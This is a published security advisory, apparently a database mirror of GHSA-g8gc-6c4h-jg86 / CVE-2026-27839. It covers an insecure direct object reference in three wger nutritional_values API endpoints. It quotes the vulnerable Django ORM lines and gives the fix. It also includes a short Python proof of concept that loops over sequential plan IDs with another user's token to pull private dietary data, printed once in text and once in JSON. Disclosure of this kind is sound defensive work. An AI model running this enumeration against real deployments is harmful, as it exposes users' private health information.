GHSA-G8GC-6C4H-JG86

Vulnerability from github – Published: 2026-02-26 22:15 – Updated: 2026-02-27 21:59
VLAI?
Summary
wger: IDOR in nutritional_values endpoints exposes private dietary data via direct ORM lookup
Details

Summary

Three nutritional_values action endpoints fetch objects via Model.objects.get(pk=pk) — a raw ORM call that bypasses the user-scoped queryset. Any authenticated user can read another user's private nutrition plan data, including caloric intake and full macro breakdown, by supplying an arbitrary PK.

Details

DRF detail actions do not automatically apply queryset filtering — the action must call self.get_object() to enforce object-level permissions. These three endpoints skip that and go directly to the ORM:

wger/nutrition/api/views.py:

# line 301 — NutritionPlanViewSet
plan = NutritionPlan.objects.get(pk=pk)           # VULNERABLE — no user check

# line 356 — MealViewSet
meal = Meal.objects.get(pk=pk)                    # VULNERABLE

# line 403 — MealItemViewSet
meal_item = MealItem.objects.get(pk=pk)           # VULNERABLE

The correct pattern used in the same file at LogItemViewSet (line 438):

LogItem.objects.get(pk=pk, plan__user=self.request.user)  # CORRECT

Affected endpoints:

GET /api/v2/nutritionplan/{pk}/nutritional_values/
GET /api/v2/meal/{pk}/nutritional_values/
GET /api/v2/mealitem/{pk}/nutritional_values/

PoC

import requests

BASE = "http://localhost"
# Attacker's token (any registered user)
headers = {"Authorization": "Token ATTACKER_TOKEN"}

# Read victim's nutrition plan — enumerate pk starting from 1
for pk in range(1, 100):
    r = requests.get(
        f"{BASE}/api/v2/nutritionplan/{pk}/nutritional_values/",
        headers=headers
    )
    if r.status_code == 200:
        data = r.json()
        print(f"Plan {pk}: {data}")
        # Returns: energy (kcal), protein, carbohydrates, carbohydrates_sugar,
        #          fat, fat_saturated, fiber, sodium

No interaction from the victim required. Registration is open by default. PKs are sequential integers.

Impact

Any authenticated user can read other users' private dietary and health data: - Daily caloric intake - Protein, carbohydrate, fat, fiber, and sodium intake - Full meal composition and ingredient quantities

This data is sensitive health information users expect to be private.

Fix: Replace direct ORM calls with self.get_object(), which applies the viewset's user-scoped queryset and object-level permissions automatically. Or add an explicit user filter: NutritionPlan.objects.get(pk=pk, user=self.request.user).

Severity ?
4.3 (Medium)
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N
Show details on source website
To clipboard 

{
  "affected": [
    {
      "package": {
        "ecosystem": "PyPI",
        "name": "wger"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "last_affected": "2.1"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-27839"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-639"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-02-26T22:15:51Z",
    "nvd_published_at": "2026-02-26T23:16:35Z",
    "severity": "MODERATE"
  },
  "details": "## Summary\n\nThree `nutritional_values` action endpoints fetch objects via `Model.objects.get(pk=pk)` \u2014 a raw ORM call that bypasses the user-scoped queryset. Any authenticated user can read another user\u0027s private nutrition plan data, including caloric intake and full macro breakdown, by supplying an arbitrary PK.\n\n### Details\n\nDRF detail actions do not automatically apply queryset filtering \u2014 the action must call `self.get_object()` to enforce object-level permissions. These three endpoints skip that and go directly to the ORM:\n\n`wger/nutrition/api/views.py`:\n\n```python\n# line 301 \u2014 NutritionPlanViewSet\nplan = NutritionPlan.objects.get(pk=pk)           # VULNERABLE \u2014 no user check\n\n# line 356 \u2014 MealViewSet\nmeal = Meal.objects.get(pk=pk)                    # VULNERABLE\n\n# line 403 \u2014 MealItemViewSet\nmeal_item = MealItem.objects.get(pk=pk)           # VULNERABLE\n```\n\nThe correct pattern used in the same file at `LogItemViewSet` (line 438):\n\n```python\nLogItem.objects.get(pk=pk, plan__user=self.request.user)  # CORRECT\n```\n\nAffected endpoints:\n```\nGET /api/v2/nutritionplan/{pk}/nutritional_values/\nGET /api/v2/meal/{pk}/nutritional_values/\nGET /api/v2/mealitem/{pk}/nutritional_values/\n```\n\n### PoC\n\n```python\nimport requests\n\nBASE = \"http://localhost\"\n# Attacker\u0027s token (any registered user)\nheaders = {\"Authorization\": \"Token ATTACKER_TOKEN\"}\n\n# Read victim\u0027s nutrition plan \u2014 enumerate pk starting from 1\nfor pk in range(1, 100):\n    r = requests.get(\n        f\"{BASE}/api/v2/nutritionplan/{pk}/nutritional_values/\",\n        headers=headers\n    )\n    if r.status_code == 200:\n        data = r.json()\n        print(f\"Plan {pk}: {data}\")\n        # Returns: energy (kcal), protein, carbohydrates, carbohydrates_sugar,\n        #          fat, fat_saturated, fiber, sodium\n```\n\nNo interaction from the victim required. Registration is open by default. PKs are sequential integers.\n\n### Impact\n\nAny authenticated user can read other users\u0027 private dietary and health data:\n- Daily caloric intake\n- Protein, carbohydrate, fat, fiber, and sodium intake\n- Full meal composition and ingredient quantities\n\nThis data is sensitive health information users expect to be private.\n\n**Fix**: Replace direct ORM calls with `self.get_object()`, which applies the viewset\u0027s user-scoped queryset and object-level permissions automatically. Or add an explicit user filter: `NutritionPlan.objects.get(pk=pk, user=self.request.user)`.",
  "id": "GHSA-g8gc-6c4h-jg86",
  "modified": "2026-02-27T21:59:53Z",
  "published": "2026-02-26T22:15:51Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/wger-project/wger/security/advisories/GHSA-g8gc-6c4h-jg86"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-27839"
    },
    {
      "type": "WEB",
      "url": "https://github.com/wger-project/wger/commit/29876a1954fe959e4b58ef070170e81703dab60e"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/wger-project/wger"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N",
      "type": "CVSS_V3"
    }
  ],
  "summary": "wger: IDOR in nutritional_values endpoints exposes private dietary data via direct ORM lookup"
}


Log in or create an account to share your comment.




Tags
Taxonomy of the tags.




Sightings

Author Source Type Date

Nomenclature

  • Seen: The vulnerability was mentioned, discussed, or observed by the user.
  • Confirmed: The vulnerability has been validated from an analyst's perspective.
  • Published Proof of Concept: A public proof of concept is available for this vulnerability.
  • Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
  • Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
  • Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
  • Not confirmed: The user expressed doubt about the validity of the vulnerability.
  • Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.



Detection rules are retrieved from Rulezet.